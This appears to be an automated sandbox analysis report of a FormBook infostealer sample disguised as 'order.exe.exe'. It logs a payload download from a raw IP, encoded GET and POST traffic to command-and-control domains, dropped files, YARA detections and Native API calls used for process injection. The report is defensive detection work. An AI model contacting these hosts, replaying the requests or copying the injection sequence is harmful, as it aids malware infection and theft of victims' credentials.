4d 67 5a 31 37 54 4
Source: unknown | TCP traffic detected without corresponding DNS query: 149.255.36.133 (50 identical entries)
      Source: global trafficHTTP traffic detected: GET /bin_PqLAqQjAza233.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 149.255.36.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=7t4HToMigGNwJPMQvt254oF1CV/eJdQMsFShHVoBivPn5D5h8CbCS8esBGhfsVKMtt2q&Lv=EN9tiz_Hl HTTP/1.1Host: www.topemailleads.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=H51V9duMqRnbj95D1MvvJ7i7VbIcWL9pj3QvEMEhOvjHnOj6szug+8ev4DeAite72oGg&Lv=EN9tiz_Hl HTTP/1.1Host: www.writusp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1Host: www.hbyidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: www.contactsweeper.com
      Source: unknownHTTP traffic detected: POST /j4h/ HTTP/1.1Host: www.writusp.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.writusp.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.writusp.com/j4h/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii: 
M6Advpq=Pb5vj7f6qXKRxasw6JaCJvazS51NaLZu6TN9Q8wBOez72qryuhvW9LzLkDX46Y6q36XSBHQEhhV_MPH0OlRS5I3MisCfGBHpCEtgIV0vfkdqjk2kwylfsDgov963rBgwaQlDiMYRmYIaKD0lOdyRXenZIHjiKtLS4tNc9Osv1eZu~gnR0lefaayY4-WpB9cf53uGt7UfPYeOReGrZR(VBwGQ~z~aUSE67tbCmuKW0IM_VEtRk-zSKccw5SYw57tdU1xtgpS-pmTR8lpaHxCAgzk2dFXsG1MXlhiCKMmYRTO3ysvvzsGh3CD6Cc~AN00XYXq_N0aZagtvfS9BFlXLE4ct0fw5nzviIEq7gr4mUCXveLKVZDWKS0HysSyELmwk1SIk0Y5h7u2_qxnLBQ).
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Jun 2020 03:58:01 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 327Connection: closeContent-Type: text/html; charset=utf-8Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /j4h/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: olotql9xtrtpnd.exe, 00000014.00000002.1583495151.0000000000960000.00000004.00000020.sdmpString found in binary or memory: http://149.255.36.133/bin_Pq
      Source: order.exe.exe, 00000001.00000002.914876984.0000000000560000.00000040.00000001.sdmp, olotql9xtrtpnd.exe, 00000014.00000003.1566338299.000000000099A000.00000004.00000001.sdmp, olotql9xtrtpnd.exe, 00000015.00000002.1586660760.0000000000560000.00000040.00000001.sdmp, olotql9xtrtpnd.exe, 00000016.00000002.1611647549.0000000000560000.00000040.00000001.sdmpString found in binary or memory: http://149.255.36.133/bin_PqLAqQjAza233.bin
      Source: olotql9xtrtpnd.exe, 00000014.00000003.1566338299.000000000099A000.00000004.00000001.sdmpString found in binary or memory: http://149.255.36.133/bin_PqLAqQjAza233.bin/
      Source: olotql9xtrtpnd.exe, 00000014.00000002.1583495151.0000000000960000.00000004.00000020.sdmpString found in binary or memory: http://149.255.36.133/bin_PqLAqQjAza233.bin0e
      Source: olotql9xtrtpnd.exe, 00000014.00000002.1583495151.0000000000960000.00000004.00000020.sdmpString found in binary or memory: http://149.255.36.133/bin_PqLAqQjAza233.bin1
      Source: olotql9xtrtpnd.exe, 00000014.00000002.1583495151.0000000000960000.00000004.00000020.sdmpString found in binary or memory: http://149.255.36.133/bin_PqLAqQjAza233.binE
      Source: olotql9xtrtpnd.exe, 00000014.00000003.1566338299.000000000099A000.00000004.00000001.sdmpString found in binary or memory: http://149.255.36.133/bin_PqLAqQjAza233.bin_
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: control.exe, 00000008.00000002.2476345545.0000000002C73000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.icoX_
      Source: explorer.exe, 00000007.00000002.2473901705.0000000000CF0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: control.exe, 00000008.00000002.2479653154.0000000004ED9000.00000004.00000001.sdmpString found in binary or memory: http://www.hbyidong.com
      Source: control.exe, 00000008.00000002.2479653154.0000000004ED9000.00000004.00000001.sdmpString found in binary or memory: http://www.hbyidong.com/j4h/
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: control.exe, 00000008.00000002.2476345545.0000000002C73000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
      Source: control.exe, 00000008.00000002.2476325402.0000000002C6C000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp5
      Source: control.exe, 00000008.00000002.2476345545.0000000002C73000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

      E-Banking Fraud:

      Yara detected FormBook
      Source: Yara matchFile source: 00000015.00000002.1592683082.000000001F080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000002.1614780220.0000000000110000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000002.1583585086.0000000000590000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.1611465556.0000000000060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2471801241.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.1586527036.0000000000060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.914633096.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2472989591.0000000000A40000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000002.1590005751.000000001F080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000018.00000002.1590663270.0000000002D80000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2471201439.0000000000560000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000002.1581333071.0000000000060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.1615263059.000000001F0A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.919876173.000000001EF20000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      Detected FormBook malware
      Source: C:\Windows\SysWOW64\control.exeDropped file: C:\Users\user\AppData\Roaming\8MN1SC8U\8MNlogri.ini
      Source: C:\Windows\SysWOW64\control.exeDropped file: C:\Users\user\AppData\Roaming\8MN1SC8U\8MNlogrf.ini
      Source: C:\Windows\SysWOW64\control.exeDropped file: C:\Users\user\AppData\Roaming\8MN1SC8U\8MNlogrv.ini
      Malicious sample detected (through community Yara rule)
      Source: 00000015.00000002.1592683082.000000001F080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000015.00000002.1592683082.000000001F080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000019.00000002.1614780220.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000019.00000002.1614780220.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000017.00000002.1583585086.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000017.00000002.1583585086.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000016.00000002.1611465556.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000016.00000002.1611465556.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.2471801241.00000000005D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.2471801241.00000000005D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000015.00000002.1586527036.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000015.00000002.1586527036.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.914633096.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.914633096.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.2479356539.0000000004D5F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000008.00000002.2472989591.0000000000A40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.2472989591.0000000000A40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000014.00000002.1590005751.000000001F080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000014.00000002.1590005751.000000001F080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000018.00000002.1590663270.0000000002D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000018.00000002.1590663270.0000000002D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.2471201439.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.2471201439.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000014.00000002.1581333071.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000014.00000002.1581333071.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000016.00000002.1615263059.000000001F0A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000016.00000002.1615263059.000000001F0A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.919876173.000000001EF20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.919876173.000000001EF20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Initial sample is a PE file and has a suspicious name
      Source: initial sampleStatic PE information: Filename: order.exe.exe
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 0_2_02180F70 NtWriteVirtualMemory,0_2_02180F70
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 0_2_02182DAB NtResumeThread,0_2_02182DAB
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 0_2_021829FE NtProtectVirtualMemory,0_2_021829FE
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 0_2_02180F63 NtWriteVirtualMemory,0_2_02180F63
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 0_2_02181187 NtWriteVirtualMemory,0_2_02181187
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 0_2_02182DD7 NtResumeThread,0_2_02182DD7
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 0_2_021801C7 NtSetInformationThread,TerminateProcess,0_2_021801C7
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 0_2_021829FF NtProtectVirtualMemory,0_2_021829FF
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA700 NtProtectVirtualMemory,LdrInitializeThunk,1_2_1F1CA700
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA720 NtResumeThread,LdrInitializeThunk,1_2_1F1CA720
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA750 NtCreateFile,LdrInitializeThunk,1_2_1F1CA750
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA610 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_1F1CA610
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA6A0 NtCreateSection,LdrInitializeThunk,1_2_1F1CA6A0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA540 NtDelayExecution,LdrInitializeThunk,1_2_1F1CA540
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA560 NtQuerySystemInformation,LdrInitializeThunk,1_2_1F1CA560
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA5F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_1F1CA5F0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA410 NtQueryInformationToken,LdrInitializeThunk,1_2_1F1CA410
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA480 NtMapViewOfSection,LdrInitializeThunk,1_2_1F1CA480
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA4A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_1F1CA4A0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA360 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_1F1CA360
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA3E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_1F1CA3E0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA240 NtReadFile,LdrInitializeThunk,1_2_1F1CA240
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA2D0 NtClose,LdrInitializeThunk,1_2_1F1CA2D0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA710 NtQuerySection,1_2_1F1CA710
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA780 NtOpenDirectoryObject,1_2_1F1CA780
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA650 NtQueueApcThread,1_2_1F1CA650
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA6D0 NtCreateProcessEx,1_2_1F1CA6D0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA520 NtEnumerateKey,1_2_1F1CA520
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CBD40 NtSuspendThread,1_2_1F1CBD40
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA5A0 NtWriteVirtualMemory,1_2_1F1CA5A0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CB410 NtOpenProcessToken,1_2_1F1CB410
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA430 NtQueryVirtualMemory,1_2_1F1CA430
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA470 NtSetInformationFile,1_2_1F1CA470
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CB470 NtOpenThread,1_2_1F1CB470
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA460 NtOpenProcess,1_2_1F1CA460
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CACE0 NtCreateMutant,1_2_1F1CACE0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA310 NtEnumerateValueKey,1_2_1F1CA310
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA350 NtQueryValueKey,1_2_1F1CA350
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA370 NtQueryInformationProcess,1_2_1F1CA370
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA3D0 NtCreateKey,1_2_1F1CA3D0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CBA30 NtSetContextThread,1_2_1F1CBA30
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA220 NtWaitForSingleObject,1_2_1F1CA220
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA260 NtWriteFile,1_2_1F1CA260
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA2F0 NtQueryInformationFile,1_2_1F1CA2F0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA800 NtSetValueKey,1_2_1F1CA800
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CB0B0 NtGetContextThread,1_2_1F1CB0B0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_005629FE NtProtectVirtualMemory,1_2_005629FE
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_005601C7 NtSetInformationThread,1_2_005601C7
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_005629FF NtProtectVirtualMemory,1_2_005629FF
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_00560301 NtProtectVirtualMemory,1_2_00560301
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_00560333 NtProtectVirtualMemory,1_2_00560333
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A480 NtMapViewOfSection,LdrInitializeThunk,8_2_0489A480
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489ACE0 NtCreateMutant,LdrInitializeThunk,8_2_0489ACE0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A410 NtQueryInformationToken,LdrInitializeThunk,8_2_0489A410
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A470 NtSetInformationFile,LdrInitializeThunk,8_2_0489A470
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A540 NtDelayExecution,LdrInitializeThunk,8_2_0489A540
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A560 NtQuerySystemInformation,LdrInitializeThunk,8_2_0489A560
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A6A0 NtCreateSection,LdrInitializeThunk,8_2_0489A6A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A610 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_0489A610
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A750 NtCreateFile,LdrInitializeThunk,8_2_0489A750
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A800 NtSetValueKey,LdrInitializeThunk,8_2_0489A800
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A2D0 NtClose,LdrInitializeThunk,8_2_0489A2D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A240 NtReadFile,LdrInitializeThunk,8_2_0489A240
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A260 NtWriteFile,LdrInitializeThunk,8_2_0489A260
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A3D0 NtCreateKey,LdrInitializeThunk,8_2_0489A3D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A3E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_0489A3E0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A310 NtEnumerateValueKey,LdrInitializeThunk,8_2_0489A310
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A350 NtQueryValueKey,LdrInitializeThunk,8_2_0489A350
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A360 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_0489A360
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A4A0 NtUnmapViewOfSection,8_2_0489A4A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489B410 NtOpenProcessToken,8_2_0489B410
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A430 NtQueryVirtualMemory,8_2_0489A430
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A460 NtOpenProcess,8_2_0489A460
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0489B470 NtOpenThread
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0489A5A0 NtWriteVirtualMemory
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0489A5F0 NtReadVirtualMemory
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0489A520 NtEnumerateKey
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0489BD40 NtSuspendThread
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0489A6D0 NtCreateProcessEx
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0489A650 NtQueueApcThread
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0489A780 NtOpenDirectoryObject
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0489A700 NtProtectVirtualMemory
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0489A710 NtQuerySection
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0489A720 NtResumeThread
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0489B0B0 NtGetContextThread
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0489A2F0 NtQueryInformationFile
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0489A220 NtWaitForSingleObject
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0489BA30 NtSetContextThread
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0489A370 NtQueryInformationProcess
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_00579830 NtCreateFile
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_005798E0 NtReadFile
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_00579960 NtClose
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_00579A10 NtAllocateVirtualMemory
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0057982B NtCreateFile
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_0057995B NtClose
      Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_00579A0A NtAllocateVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 17_2_020D0F70 NtWriteVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 17_2_020D29FE NtProtectVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 17_2_020D0F63 NtWriteVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 17_2_020D1187 NtWriteVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 17_2_020D01C7 NtSetInformationThread,TerminateProcess
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 17_2_020D29FF NtProtectVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 18_2_02050F70 NtWriteVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 18_2_02052DAB NtResumeThread
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 18_2_020529FE NtProtectVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 18_2_02050F63 NtWriteVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 18_2_02051187 NtWriteVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 18_2_020501C7 NtSetInformationThread,TerminateProcess
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 18_2_02052DD7 NtResumeThread
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 18_2_020529FF NtProtectVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 19_2_006E0F70 NtWriteVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 19_2_006E29FE NtProtectVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 19_2_006E2DAB NtResumeThread
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 19_2_006E0F63 NtWriteVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 19_2_006E29FF NtProtectVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 19_2_006E01C7 NtSetInformationThread,TerminateProcess
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 19_2_006E2DD7 NtResumeThread
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 19_2_006E1187 NtWriteVirtualMemory
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A720 NtResumeThread,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A700 NtProtectVirtualMemory,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A750 NtCreateFile,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A610 NtAdjustPrivilegesToken,LdrInitializeThunk
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe Code function: 20_2_1F32A6A0 NtCreateSection,LdrInitializeThunk
